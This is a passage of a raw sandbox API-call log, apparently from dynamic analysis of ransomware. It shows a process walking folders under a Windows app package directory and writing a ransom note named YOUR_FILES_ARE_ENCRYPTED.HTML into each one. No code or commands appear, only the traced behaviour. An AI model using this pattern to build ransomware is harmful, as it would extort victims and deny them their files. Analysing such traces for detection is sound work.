[0119.897] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\INetHistory\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowsalarms_8wekyb3d8bbwe\\ac\\inethistory\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0119.898] WriteFile (in: hFile=0x324, lpBuffer=0x3104fd0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3104fd0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0119.899] CloseHandle (hObject=0x324) returned 1 [0119.899] GetProcessHeap () returned 0x600000 [0119.899] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3104fd0 | out: hHeap=0x600000) returned 1 [0119.899] GetProcessHeap () returned 0x600000 [0119.900] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 [0119.900] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec922b53, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xec922b53, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xec922b53, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da3c6, dwReserved1=0x6da318, cFileName="Temp", cAlternateFileName="")) returned 1 [0119.900] StrStrIW (lpFirst="Temp", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.900] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\Temp") returned 94 [0119.900] GetProcessHeap () returned 0x600000 [0119.900] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f4fc8 [0119.900] lstrcpyW (in: lpString1=0x30f4fc8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\Temp" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\Temp") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\Temp" [0119.900] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\Temp", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\Temp\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\Temp\\*" [0119.900] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\Temp\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec922b53, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xec922b53, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xec922b53, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da858, dwReserved1=0x6da320, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0119.900] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec922b53, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xec922b53, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xec922b53, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da858, dwReserved1=0x6da320, cFileName="..", cAlternateFileName="")) returned 1 [0119.900] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec922b53, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xec922b53, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xec922b53, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da858, dwReserved1=0x6da320, cFileName="..", cAlternateFileName="")) returned 0 [0119.900] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0119.901] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 124 [0119.901] GetProcessHeap () returned 0x600000 [0119.901] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3106fd8 [0119.901] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowsalarms_8wekyb3d8bbwe\\ac\\temp\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0119.902] WriteFile (in: hFile=0x324, lpBuffer=0x3106fd8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3106fd8*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0119.903] CloseHandle (hObject=0x324) returned 1 [0119.903] GetProcessHeap () returned 0x600000 [0119.903] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0119.903] GetProcessHeap () returned 0x600000 [0119.903] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 [0119.905] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec922b53, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xec922b53, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xec922b53, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da3c6, dwReserved1=0x6da318, cFileName="Temp", cAlternateFileName="")) returned 0 [0119.905] FindClose (in: hFindFile=0x6267b8 | out: hFindFile=0x6267b8) returned 1 [0119.906] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 119 [0119.906] GetProcessHeap () returned 0x600000 [0119.906] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x30f4fc8 [0119.906] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowsalarms_8wekyb3d8bbwe\\ac\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0119.907] WriteFile (in: hFile=0x320, lpBuffer=0x30f4fc8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x30f4fc8*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0119.908] CloseHandle (hObject=0x320) returned 1 [0119.908] GetProcessHeap () returned 0x600000 [0119.908] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 [0119.908] GetProcessHeap () returned 0x600000 [0119.908] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0119.910] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec83db29, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xec83db29, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xec83db29, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="AppData", cAlternateFileName="")) returned 1 [0119.910] StrStrIW (lpFirst="AppData", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.910] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AppData") returned 94 [0119.910] GetProcessHeap () returned 0x600000 [0119.910] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0119.911] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AppData" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AppData") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AppData" [0119.911] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AppData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AppData\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AppData\\*" [0119.911] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AppData\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec83db29, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xec83db29, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xec83db29, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da3c6, dwReserved1=0x6da318, cFileName=".", cAlternateFileName="")) returned 0x626838 [0119.911] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec83db29, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xec83db29, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xec83db29, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da3c6, dwReserved1=0x6da318, cFileName="..", cAlternateFileName="")) returned 1 [0119.911] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec83db29, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xec83db29, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xec83db29, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da3c6, dwReserved1=0x6da318, cFileName="..", cAlternateFileName="")) returned 0 [0119.911] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0119.912] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AppData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 124 [0119.912] GetProcessHeap () returned 0x600000 [0119.912] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x30f4fc8 [0119.912] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AppData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowsalarms_8wekyb3d8bbwe\\appdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0119.913] WriteFile (in: hFile=0x320, lpBuffer=0x30f4fc8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x30f4fc8*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0119.915] CloseHandle (hObject=0x320) returned 1 [0119.915] GetProcessHeap () returned 0x600000 [0119.915] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 [0119.915] GetProcessHeap () returned 0x600000 [0119.915] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0119.915] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec70c8e4, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xec70c8e4, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xec70c8e4, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="LocalCache", cAlternateFileName="LOCALC~1")) returned 1 [0119.915] StrStrIW (lpFirst="LocalCache", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.915] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\LocalCache") returned 97 [0119.915] GetProcessHeap () returned 0x600000 [0119.915] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0119.915] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\LocalCache" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\LocalCache") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\LocalCache" [0119.915] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\LocalCache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\LocalCache\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\LocalCache\\*" [0119.915] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\LocalCache\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec70c8e4, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xec70c8e4, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xec70c8e4, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da3c6, dwReserved1=0x6da318, cFileName=".", cAlternateFileName="")) returned 0x626638 [0119.916] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec70c8e4, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xec70c8e4, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xec70c8e4, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da3c6, dwReserved1=0x6da318, cFileName="..", cAlternateFileName="")) returned 1 [0119.916] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec70c8e4, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xec70c8e4, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xec70c8e4, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da3c6, dwReserved1=0x6da318, cFileName="..", cAlternateFileName="")) returned 0 [0119.917] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0119.917] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\LocalCache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 127 [0119.917] GetProcessHeap () returned 0x600000 [0119.917] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x30f4fc8 [0119.917] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\LocalCache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowsalarms_8wekyb3d8bbwe\\localcache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0119.919] WriteFile (in: hFile=0x320, lpBuffer=0x30f4fc8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x30f4fc8*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0119.920] CloseHandle (hObject=0x320) returned 1 [0119.920] GetProcessHeap () returned 0x600000 [0119.920] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 [0119.920] GetProcessHeap () returned 0x600000 [0119.920] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0119.921] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec6e67c2, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xec6e67c2, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xec6e67c2, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="LocalState", cAlternateFileName="LOCALS~1")) returned 1 [0119.922] StrStrIW (lpFirst="LocalState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.922] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\LocalState") returned 97 [0119.922] GetProcessHeap () returned 0x600000 [0119.922] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0119.923] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\LocalState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\LocalState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\LocalState" [0119.923] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\LocalState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\LocalState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\LocalState\\*" [0119.923] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\LocalState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec6e67c2, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xec6e67c2, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xec6e67c2, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da3c6, dwReserved1=0x6da318, cFileName=".", cAlternateFileName="")) returned 0x626638 [0119.923] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec6e67c2, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xec6e67c2, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xec6e67c2, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da3c6, dwReserved1=0x6da318, cFileName="..", cAlternateFileName="")) returned 1 [0119.923] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec6e67c2, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xec6e67c2, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xec6e67c2, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da3c6, dwReserved1=0x6da318, cFileName="..", cAlternateFileName="")) returned 0 [0119.923] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0119.923] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\LocalState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 127 [0119.923] GetProcessHeap () returned 0x600000 [0119.923] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x30f4fc8 [0119.924] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\LocalState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowsalarms_8wekyb3d8bbwe\\localstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0119.925] WriteFile (in: hFile=0x320, lpBuffer=0x30f4fc8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x30f4fc8*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0119.926] CloseHandle (hObject=0x320) returned 1 [0119.926] GetProcessHeap () returned 0x600000 [0119.926] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 [0119.926] GetProcessHeap () returned 0x600000 [0119.926] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0119.926] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeda459b8, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xeda459b8, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xeda459b8, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="Microsoft.WindowsAlarms_10.1510.12020.0_x64__8wekyb3d8bbwe", cAlternateFileName="MICROS~1.0_X")) returned 1 [0119.926] StrStrIW (lpFirst="Microsoft.WindowsAlarms_10.1510.12020.0_x64__8wekyb3d8bbwe", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.926] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\Microsoft.WindowsAlarms_10.1510.12020.0_x64__8wekyb3d8bbwe") returned 145 [0119.926] 